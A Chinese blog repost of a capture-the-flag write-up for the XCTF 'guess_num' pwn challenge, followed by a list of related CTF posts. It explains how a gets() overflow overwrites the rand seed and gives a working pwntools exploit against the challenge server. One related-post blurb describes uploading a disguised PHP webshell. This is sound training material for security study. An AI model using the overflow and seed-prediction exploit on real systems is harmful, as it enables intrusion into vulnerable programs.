day-8 xctf-guess_num

最新推荐文章于 2022-02-09 22:52:14 发布
最新推荐文章于 2022-02-09 22:52:14 发布
阅读量118 收藏
点赞数
原文链接:http://www.cnblogs.com/yidianhan/p/11604948.html
版权

xctf-guess_num

题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5057&page=1

 

checksec文件:

 

 

 开启了carry,不能进行栈溢出

 

用ida打开:

 

 

 功能很简单,先输入你的name,进行十次输入,进行比较rand number,成功则调用sub_C3E(),也就是system函数

 

 

只需要控制随机数种子,就可以使输出可控。这里可以通过gets函数的输入覆盖种子seed

rand函数和srand函数相关知识:https://blog.csdn.net/qq_41199502/article/details/80726780

可以看到:var30和seed相差20

 

 

 

通过ldd查找libc共享库, 这里python需要用到c语言的标准动态库(https://www.cnblogs.com/yssjun/p/9960479.html

 

 

可以构造exp:

from pwn import *
from ctypes import *
context.log_level = 'debug'
#cnn = process('./guess_num')
cnn = remote("111.198.29.45","51398")
elf = ELF('./guess_num')
# libc = elf.libc
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = 0x20*'a' + p64(1)
cnn.recvuntil('name:')
cnn.sendline(payload)
libc.srand(1)
for i in range(10):
    cnn.sendlineafter('number:',str(libc.rand()%6+1))    
cnn.interactive()
exp

 

转载于:https://www.cnblogs.com/yidianhan/p/11604948.html

a525024162806525
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2017 NJCTF Web Guess
wywwzjj
12-30 1765
PHP 伪随机数安全问题
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF Guess
stepone4ward的博客
07-16 371
phar文件上传 随机数预测
guess_num.py
08-11
自己用python 写了个非常简单的入门小游戏,猜数字,可以修改源码,加大难度,挺好玩的 玩法如下: 1、系统随机给出一个1-20的数字 2、玩家来猜,共5次机会,猜对后提示: !!Great,you guess the num! 用完5次机会还没猜对,提示: Your retry times>5,Game over! 3、期间会有提示 猜的数字是偏大,还是偏小
攻防世界 xctf -Guess writeup
小傅
07-17 1272
本题的解析官网上有,这里是一个自动化的脚本,完成的是自动上传一个ant.jpg的文件(ant.jpg是一个ant.zip压缩包重命名的文件,里面是一个ant.php的一句话木马)。运行返回的是在web后台这个文件重命名后的文件的url。可通过zip伪协议访问这个木马。 这个脚本运行需要3个在linux下运行的脚本文件(因为php伪随机数的破解用了一些工具,还有一些php代码)。脚本文件有:猜解随...
pwn 做题记录 2.9 adworld guess_num
qq_62423835的博客
02-09 238
菜鸡日记,包含着大量迷惑,师傅们可以进来喷,找详细题解就不要点了
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
XCTF-HW-pipeline附件
11-09
附件
XCTF Guess-the-Number
YenKoc的博客
03-22 415
一.发现是jar文件,一定想到反汇编gdui这个工具,而且运行不起来,可能是我电脑问题,我就直接反编译出来了。 也发现了flag,和对应的算法,直接拉出来,在本地运行,后得到flag 二.java代码 ...
XCTF嘉年华 crypto1 Writeup
煮酒闲谈
10-17 1487
摘要题目描述 crypto1小明今天去妹纸家开Party,而妹纸却给他出了一个谜语,说只要他能答出来,她就会答应小明一个要求. 这是妹纸给小明的谜语序列:EW91X2FYZV9HX2DVB2RFYM95=解题思路1、从密文的格式上看,像是base64加密,直接解密之,得到如下字符串: ou_aXe_G_ՇdEϹ 解密出来的前两个字符串,像是正常的,就是说很有可能是base64编码。2、考虑到
RCTF2015-Mobile-出题思路及Writeup
weixin_34198797的博客
03-08 1026
Xbalien · 2015/11/18 10:16@Xbalien ROIS从最初CTF上apk的简单反编译到现在各种加固逆向,难度已经上升了好多个级别。但感觉除了ACTF,多数的Mobile题目还是以逆向为主。此次作为ROIS成员有幸能参与到RCTF2015的出题工作中,于是尝试了一些新的出题思路,导致大家做题都很不适应,也把大家坑了一波。欢迎建议、意见、吐槽。这次RCTF单独了一个Mobil...
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4266
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
adworld-pwn-guess_num
bunner_的博客
10-21 201
本题考查知识点 srand()函数和rand()函数的随机数生成规则 gets()函数漏洞 – 实现栈溢出 check_sec 扔到IDA分析代码逻辑 srand()函数和rand()函数 前者设置随机种子,后者产生随机数 设置随机种子之后,随机数是循环产生的 从上图中可以看到v8和seed之间的位置关系,而v8是通过gets()函数输入的,我们可以通过栈溢出,从而达到设置seed的目的 v8 占用0x20个字节 seed 占用8个字节 所以我们构造下面的payload即可设置se.
xctf--新手区--guess_num
gclome的博客
04-20 743
writeup 老规矩,先checksec下,查看保护机制 64位程序,保护机制全开啊,不过不慌,先运行一下大致看看 两次输入分别是Your name和 guess number ,其余皆是程序输出,貌似没有得到什么有用的东西。 再次借助强大的IDA查看源码: 分析源码得知,我们要输入十次随机数产生的值,如果一次错,那就GG,十次全部输入正确,就success!,flag应该就藏在succes...
中科曙光ParaStor300s分布式存储整机更换操作手册.docx
07-12
中科曙光ParaStor300s分布式存储整机更换操作手册.docx
Vue 面试指南附源代码
最新发布
07-12
项目总结 本文档详细介绍了Vue.js的技术要点、常见面试问题及其解答,以及几道面试编程题的实现。通过这些内容,读者可以深入理解Vue.js的核心概念和应用,并通过实际编程练习提升面试准备的效率和效果。希望本文档能够帮助读者在Vue.js相关的面试中脱颖而出,取得成功。
2024年欧洲老年性黄斑变性药物市场主要企业市场占有率及排名.docx
07-12
2024年欧洲老年性黄斑变性药物市场主要企业市场占有率及排名.docx
工作汇报总结PPT模板 (2)
07-12
【作品名称】:工作汇报总结PPT模板 (2) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
guess-xsctf
07-28
根据提供的引用内容,我无法确定问题"guess-xsctf"的具体含义。请提供更多的信息或者明确你的问题,我将尽力回答。 #### 引用[.reference_title] - *1* [xctf攻防世界 REVERSE 高手进阶区 Guess-the-Number](https://blog.csdn.net/l8947943/article/details/124064262)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [攻防世界 xctf -Guess writeup](https://blog.csdn.net/haodeshua/article/details/96317161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值